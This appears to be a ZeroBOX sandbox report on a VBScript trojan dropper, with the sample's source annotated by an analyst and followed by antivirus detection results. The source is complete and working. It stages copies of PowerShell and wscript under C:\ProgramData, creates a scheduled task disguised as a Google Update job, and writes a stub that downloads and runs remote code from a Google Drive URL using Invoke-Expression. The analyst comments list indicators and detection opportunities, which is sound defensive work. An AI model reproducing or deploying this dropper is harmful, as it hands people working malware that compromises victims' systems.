Static | ZeroBOX
No static analysis available.
' ResContent: file-drop helper. Creates (or overwrites) the text file at
' `pth` and writes `cnt` to it as a single line.
'   pth - full path of the file to create
'   cnt - text content to write
' ProStart calls this three times to stage winappversion.ini, runps.vbs and
' conf.ps1, so each ResContent call is a file-creation event worth correlating.
Sub ResContent(pth, cnt)
Set fso = CreateObject("Scripting.FileSystemObject")
' Second argument `true` = overwrite an existing file, so re-running the
' dropper silently replaces previously staged files.
Set txtFile = fso.CreateTextFile(pth,true)
' The random-looking comment below is filler that recurs throughout the
' script; it has no runtime effect.
'ioufvrs5drdswtdjgbiuge578tdrsewavcbfjhliu
txtFile.Writeline(cnt)
txtFile.close
End Sub
' PSCopy: copies the 32-bit (SysWOW64) powershell.exe and wscript.exe into
' the staging folder C:\ProgramData\WindowsAppCertification\.
' Analyst note: the later stages invoke these copies by their staged path, so
' rules keyed only on the System32/SysWOW64 image path will not see them.
' Detection opportunity: powershell.exe or wscript.exe written to, or executing
' from, a directory under C:\ProgramData.
' There is no error handling in this Sub; the SysWOW64 source paths are
' presumably absent on 32-bit Windows, in which case the copy would fail.
Sub PSCopy()
Dim FSO
Set FSO = CreateObject("Scripting.FileSystemObject")
' Filler comment repeated across the script; no runtime effect.
'ioufvrs5drdswtdjgbiuge578tdrsewavcbfjhliu
FSO.CopyFile "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" , "C:\ProgramData\WindowsAppCertification\"
FSO.CopyFile "C:\Windows\SysWOW64\wscript.exe" , "C:\ProgramData\WindowsAppCertification\"
End Sub
' ProStart: main dropper routine. Summary of observable behaviour:
'   1. Creates the staging folder C:\ProgramData\WindowsAppCertification.
'   2. Writes three files there via ResContent:
'        winappversion.ini - VBScript (despite the .ini extension) that
'                            registers a scheduled task for persistence
'        runps.vbs         - VBScript that runs conf.ps1 with the staged
'                            powershell.exe
'        conf.ps1          - one-line PowerShell download-and-execute stub
'   3. Copies powershell.exe and wscript.exe into the folder (PSCopy).
'   4. Launches winappversion.ini through WMI Win32_Process.Create.
' Indicators visible in this routine: the folder path, the three file names,
' the task name GoogleUpdateTaskMachineUAB, and the Google Drive URL.
Sub ProStart()
' Errors are suppressed for the rest of this Sub, so a failed step (for
' example the folder already existing) does not stop the chain.
On Error Resume Next
Set scFSO = CreateObject("Scripting.FileSystemObject")
scFSO.CreateFolder("C:\ProgramData\WindowsAppCertification")
' WMI Win32_Process class object, used at the end to spawn the first stage.
Set wm = GetObject("winmgmts:win32_process")
' Filler comment repeated across the script; no runtime effect.
'ioufvrs5drdswtdjgbiuge578tdrsewavcbfjhliu
folderpth = "C:\ProgramData\WindowsAppCertification\"
ygvuhb = folderpth & "winappversion.ini"
powshellpth = folderpth & "powershell.exe"
wscriptpath = folderpth & "wscript.exe"
runpspath = folderpth & "runps.vbs"
confpth = folderpth & "conf.ps1"
' Content of winappversion.ini: runs `schtasks /create` through cmd.exe with a
' hidden window (0) and waits for completion (true). The task is named
' GoogleUpdateTaskMachineUAB (resembles Google Update task naming), runs every
' 2 hours (/sc hourly /mo 2), and its action is the staged wscript.exe in
' batch mode (//b) executing runps.vbs.
rdxtfcesz = "On Error Resume Next:Set WshShell = WScript.CreateObject(""WScript.Shell""):Return=WshShell.Run(""cmd /c schtasks /create /sc hourly /mo 2 /tn """"GoogleUpdateTaskMachineUAB"""" /tr """"" & wscriptpath & " //b " & runpspath & """"""",0,true)"
'ioufvrs5drdswtdjgbiuge578tdrsewavcbfjhliu
' Content of runps.vbs: runs the staged powershell.exe with
' -ExecutionPolicy Bypass against conf.ps1, hidden window, waiting for exit.
runpscont = "On Error Resume Next:Set WshShell = WScript.CreateObject(""WScript.Shell""):Return=WshShell.Run(""" & powshellpth & " -ExecutionPolicy Bypass -Command " & confpth & """,0,true)"
' Content of conf.ps1: fetches text from the Google Drive URL and passes it
' straight to iex (Invoke-Expression). The next stage is therefore retrieved
' on every task run and is not contained in this sample; only this stub is
' written to disk by the code shown here.
confcont = "iex (New-Object Net.WebClient).DownloadString('https://drive.google.com/uc?export=download&id=1wKzc_xz_qdqDWnIrCl3KmMpXFFKaEsG8&confirm=t')"
' Stage the three files, then the renamed interpreter copies.
ResContent ygvuhb, rdxtfcesz
ResContent runpspath, runpscont
ResContent confpth, confcont
PSCopy
' Start the persistence stage through WMI. //e:vbscript forces the VBScript
' engine so the .ini file is executed as script; //b suppresses prompts.
' Note this call uses an unqualified "wscript.exe", not the staged copy.
' A process created this way typically shows WmiPrvSE.exe as its parent
' rather than the original script host - verify in process telemetry.
wm.Create "wscript.exe //e:vbscript //b " & ygvuhb
End Sub
' Script entry point: ProStart is invoked unconditionally as soon as the
' script is loaded by the script host; there is no argument or environment check.
ProStart
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
FireEye Dropped:Trojan.Agent.ELAT
CAT-QuickHeal Clean
ALYac Dropped:Trojan.Agent.ELAT
Malwarebytes Clean
VIPRE Dropped:Trojan.Agent.ELAT
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 PowerShell/TrojanDownloader.Agent.FUK
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Dropped:Trojan.Agent.ELAT
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Dropped:Trojan.Agent.ELAT
Rising Dropper.Agent/VBS!1.E3C2 (CLASSIC)
Ad-Aware Dropped:Trojan.Agent.ELAT
Sophos Clean
Baidu Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.VBS.Dropper.zp
CMC Clean
Emsisoft Dropped:Trojan.Agent.ELAT (B)
Ikarus Clean
GData Dropped:Trojan.Agent.ELAT
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Agent.ELAT
SUPERAntiSpyware Clean
Microsoft Trojan:Script/Wacatac.B!ml
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX malware (ai score=89)
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.